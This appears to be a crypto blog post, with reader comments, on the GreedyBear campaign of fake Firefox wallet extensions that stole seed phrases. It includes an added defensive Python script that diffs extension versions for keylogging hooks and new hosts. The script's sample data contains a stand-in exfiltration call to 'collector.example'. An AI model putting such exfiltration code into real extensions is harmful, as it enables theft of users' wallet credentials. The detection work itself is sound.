Mozilla Firefox Crypto Breach

An artificial intelligence (AI) hack has rocked the cryptocurrency sector, which has been hit with yet another high-tech heist. Combining AI with malicious browser extensions, a new generation of crypto hackers has emerged, a group being called GreedyBear. The group used AI-generated Firefox add-ons to steal over USD 1 million in digital assets from unsuspecting users.

Here's what's known so far

Security researchers from Koi Security uncovered the elaborate GreedyBear Firefox campaign, which so far has seen over 150 malicious extensions uploaded to the official Firefox add-ons marketplace. These extensions were designed to impersonate popular cryptocurrency wallets, with the main targets being MetaMask, Phantom, TronLink, Rabby Wallet and Exodus.

Using what is referred to as extension or process hollowing, the attackers bypassed Mozilla’s safeguards: they created seemingly harmless wallet extensions, uploaded them for approval and got them listed.

They then posted fake positive reviews and ratings, making the extensions look legitimate to potential users. Once the extensions were trusted and installed by enough people, the attackers silently updated them with malicious code.

This malicious code acted as a keylogger and captured everything the victims typed into wallet forms, including private keys, seed phrases and passwords. It also logged victims’ IP addresses and sent all this sensitive information to attacker-controlled servers.
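
One way a defender could triage the silent update described above, as an added example that is not from the original article or from Koi Security: compare the version of an extension that was first listed with its later update, and flag input listeners, remote hosts and permissions that only appear in the update. The file contents, the `collector.example` host and the regex heuristics are constructed assumptions.

```python
import json
import re

# Heuristics chosen for this example (assumptions, not a complete ruleset).
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
HOOK_RE = re.compile(r"addEventListener\(\s*['\"](keydown|keyup|input|change|paste)['\"]")

def manifest_perms(files):
    """Permissions and host permissions requested in manifest.json."""
    m = json.loads(files.get("manifest.json", "{}"))
    return set(m.get("permissions", [])) | set(m.get("host_permissions", []))

def scan_scripts(files):
    """Collect remote hosts and form/keyboard listeners found in .js files."""
    hosts, hooks = set(), set()
    for name, text in files.items():
        if name.endswith(".js"):
            hosts |= set(URL_RE.findall(text))
            hooks |= {(name, ev) for ev in HOOK_RE.findall(text)}
    return hosts, hooks

def diff_update(old, new):
    """Report what an update introduced relative to the version first listed."""
    (old_hosts, old_hooks), (new_hosts, new_hooks) = scan_scripts(old), scan_scripts(new)
    return {
        "new_files": sorted(set(new) - set(old)),
        "new_permissions": sorted(manifest_perms(new) - manifest_perms(old)),
        "new_hosts": sorted(new_hosts - old_hosts),
        "new_input_hooks": sorted(new_hooks - old_hooks),
    }

def is_suspicious(report):
    """Input capture and a new remote host arriving in the same update."""
    return bool(report["new_input_hooks"] and report["new_hosts"])

# Constructed sample: filename -> contents for two versions of one extension.
V1 = {"manifest.json": json.dumps({"version": "1.0", "permissions": ["storage"]}),
      "popup.js": "render();"}
V2 = {"manifest.json": json.dumps({"version": "1.1",
                                   "permissions": ["storage", "<all_urls>"]}),
      "popup.js": "render();\nform.addEventListener('input', onField);",
      "sync.js": "send('https://collector.example/submit', payload);"}

if __name__ == "__main__":
    print(json.dumps(diff_update(V1, V2), indent=2))
```

A hit from these heuristics is a reason to read the changed files by hand, not proof of malice: legitimate wallets also listen to form input and call remote APIs.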

How AI Helped the Hackers

By utilising AI, the hackers were able to roll out the code faster than previously possible, and to more people, at what is being referred to as an "industrial scale". The AI-generated code also helped evade traditional security scans by creating more sophisticated and varied attack scripts, and it allowed the attackers to roll out dozens of variations quickly, making it harder for security teams to shut down the hack entirely.

Although Mozilla has since removed the malicious extensions, the threat seems to be far from over. Researchers have identified a potential Chrome Web Store variant of the attack, with a suspicious extension named Filecoin Wallet showing similar tactics.

Crypto users are being advised to check their recent downloads and take caution.

Please share this article so we can let more people know!

Image sources provided supplemented by Canva Pro Subscription. This is not financial advice and readers are advised to undertake their own research or seek professional financial services.

Damn!
It's annoying it can happen, but tbh, it's pretty clever by them.
I feel sorry for the victims and I hope they all get their funds back!
!BBH

Quite alarming really, what's next?

I don't even have the imagination to come up with what will be the next thing.
But this is a good reason to stick to wallets you know beforehand, or have a recommendation from a friend.

Very sophisticated. Glad I know I have the right extensions.
